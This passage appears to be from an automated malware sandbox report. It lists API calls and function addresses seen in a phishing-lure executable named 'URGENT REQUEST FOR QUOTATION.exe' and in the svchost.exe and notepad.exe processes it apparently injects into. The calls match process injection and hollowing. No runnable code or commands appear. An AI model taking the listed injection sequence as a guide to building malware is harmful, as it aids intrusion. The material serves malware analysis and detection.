            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C70 NtFreeVirtualMemory,1_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C60 NtCreateKey,1_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173090 NtSetValueKey,1_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D70 NtOpenThread,1_2_03173D70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C34650 NtSuspendThread,LdrInitializeThunk,6_2_04C34650
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C34340 NtSetContextThread,LdrInitializeThunk,6_2_04C34340
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04C32CA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32C60 NtCreateKey,LdrInitializeThunk,6_2_04C32C60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04C32C70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32DD0 NtDelayExecution,LdrInitializeThunk,6_2_04C32DD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04C32DF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04C32D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04C32D30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04C32EE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04C32E80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32FE0 NtCreateFile,LdrInitializeThunk,6_2_04C32FE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32FB0 NtResumeThread,LdrInitializeThunk,6_2_04C32FB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32F30 NtCreateSection,LdrInitializeThunk,6_2_04C32F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32AD0 NtReadFile,LdrInitializeThunk,6_2_04C32AD0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32AF0 NtWriteFile,LdrInitializeThunk,6_2_04C32AF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04C32BE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04C32BF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04C32BA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32B60 NtClose,LdrInitializeThunk,6_2_04C32B60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C335C0 NtCreateMutant,LdrInitializeThunk,6_2_04C335C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C339B0 NtGetContextThread,LdrInitializeThunk,6_2_04C339B0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32CC0 NtQueryVirtualMemory,6_2_04C32CC0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32CF0 NtOpenProcess,6_2_04C32CF0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32C00 NtQueryInformationProcess,6_2_04C32C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32DB0 NtEnumerateKey,6_2_04C32DB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32D00 NtSetInformationFile,6_2_04C32D00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32EA0 NtAdjustPrivilegesToken,6_2_04C32EA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32E30 NtWriteVirtualMemory,6_2_04C32E30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32F90 NtProtectVirtualMemory,6_2_04C32F90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32FA0 NtQuerySection,6_2_04C32FA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32F60 NtCreateProcessEx,6_2_04C32F60
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32AB0 NtWaitForSingleObject,6_2_04C32AB0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C32B80 NtQueryInformationFile,6_2_04C32B80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C33090 NtSetValueKey,6_2_04C33090
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C33010 NtOpenDirectoryObject,6_2_04C33010
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C33D70 NtOpenThread,6_2_04C33D70
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C33D10 NtOpenProcessToken,6_2_04C33D10
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029B9270 NtDeleteFile,6_2_029B9270
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029B9320 NtClose,6_2_029B9320
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029B9000 NtCreateFile,6_2_029B9000
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029B9170 NtReadFile,6_2_029B9170
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_029B9480 NtAllocateVirtualMemory,6_2_029B9480
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0009D5EB
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0009E8F6
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000A20460_2_000A2046
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000380600_2_00038060
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000982980_2_00098298
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0006E4FF0_2_0006E4FF
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0006676B0_2_0006676B
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000C48730_2_000C4873
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0005CAA00_2_0005CAA0
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0003CAF00_2_0003CAF0
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0004CC390_2_0004CC39
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00066DD90_2_00066DD9
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0004B1190_2_0004B119
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000391C00_2_000391C0
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000513940_2_00051394
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000517060_2_00051706
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0005781B0_2_0005781B
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000379200_2_00037920
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_0004997D0_2_0004997D
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000519B00_2_000519B0
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00057A4A0_2_00057A4A
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00051C770_2_00051C77
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00057CA70_2_00057CA7
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000BBE440_2_000BBE44
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00069EEE0_2_00069EEE
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_00051F320_2_00051F32
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_01B65F280_2_01B65F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004186E31_2_004186E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004020731_2_00402073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168D31_2_004168D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C01_2_004031C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D0A1_2_00402D0A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D101_2_00402D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042ED831_2_0042ED83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026201_2_00402620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA3521_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032003E61_2_032003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F01_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E02741_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C02C01_2_031C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA1181_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031301001_2_03130100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C81581_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032001AA1_2_032001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F41A21_2_031F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F81CC1_2_031F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D20001_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031647501_2_03164750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031407701_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C01_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C6E01_2_0315C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031405351_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032005911_2_03200591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E44201_2_031E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F24461_2_031F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EE4F61_2_031EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB401_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F6BD71_2_031F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA801_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031569621_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320A9A61_2_0320A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A01_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314A8401_2_0314A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031428401_2_03142840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031268B81_2_031268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E8F01_2_0316E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160F301_2_03160F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E2F301_2_031E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03182F281_2_03182F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4F401_2_031B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BEFA01_2_031BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132FC81_2_03132FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEE261_2_031FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140E591_2_03140E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152E901_2_03152E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FCE931_2_031FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEEDB1_2_031FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DCD1F1_2_031DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314AD001_2_0314AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03158DBF1_2_03158DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313ADE01_2_0313ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140C001_2_03140C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0CB51_2_031E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130CF21_2_03130CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A01_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C01_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D2F01_2_0315D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B16B1_2_0320B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F1721_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317516C1_2_0317516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314B1B01_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF0CC1_2_031EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C01_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F70E91_2_031F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF0E01_2_031FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF7B01_2_031FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031856301_2_03185630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F16CC1_2_031F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F75711_2_031F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DD5B01_2_031DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032095C31_2_032095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF43F1_2_031FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031314601_2_03131460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFB761_2_031FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FB801_2_0315FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B5BF01_2_031B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317DBF91_2_0317DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFA491_2_031FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7A461_2_031F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B3A6C1_2_031B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DDAAC1_2_031DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03185AA01_2_03185AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E1AA31_2_031E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EDAC61_2_031EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D59101_2_031D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031499501_2_03149950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B9501_2_0315B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD8001_2_031AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031438E01_2_031438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFF091_2_031FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141F921_2_03141F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFFB11_2_031FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD21_2_03103FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD51_2_03103FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03149EB01_2_03149EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F1D5A1_2_031F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143D401_2_03143D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7D731_2_031F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FDC01_2_0315FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B9C321_2_031B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFCF21_2_031FFCF2
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E12765_2_037E1276
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037DF2F65_2_037DF2F6
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E79D65_2_037E79D6
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E10565_2_037E1056
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037E97E65_2_037E97E6
            Source: C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exeCode function: 5_2_037FFE865_2_037FFE86
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CAE4F66_2_04CAE4F6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB24466_2_04CB2446
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA44206_2_04CA4420
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CC05916_2_04CC0591
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C005356_2_04C00535
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C1C6E06_2_04C1C6E0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BFC7C06_2_04BFC7C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C247506_2_04C24750
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C007706_2_04C00770
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C920006_2_04C92000
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB81CC6_2_04CB81CC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CC01AA6_2_04CC01AA
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB41A26_2_04CB41A2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C881586_2_04C88158
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BF01006_2_04BF0100
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C9A1186_2_04C9A118
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C802C06_2_04C802C0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA02746_2_04CA0274
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CC03E66_2_04CC03E6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C0E3F06_2_04C0E3F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBA3526_2_04CBA352
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BF0CF26_2_04BF0CF2
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA0CB56_2_04CA0CB5
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C00C006_2_04C00C00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BFADE06_2_04BFADE0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C18DBF6_2_04C18DBF
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C0AD006_2_04C0AD00
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C9CD1F6_2_04C9CD1F
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBEEDB6_2_04CBEEDB
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C12E906_2_04C12E90
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBCE936_2_04CBCE93
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C00E596_2_04C00E59
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBEE266_2_04CBEE26
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C7EFA06_2_04C7EFA0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BF2FC86_2_04BF2FC8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C74F406_2_04C74F40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C42F286_2_04C42F28
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C20F306_2_04C20F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CA2F306_2_04CA2F30
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BE68B86_2_04BE68B8
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C2E8F06_2_04C2E8F0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C0A8406_2_04C0A840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C028406_2_04C02840
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C029A06_2_04C029A0
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CCA9A66_2_04CCA9A6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04C169626_2_04C16962
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BFEA806_2_04BFEA80
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CB6BD76_2_04CB6BD7
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04CBAB406_2_04CBAB40
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_04BF14606_2_04BF1460
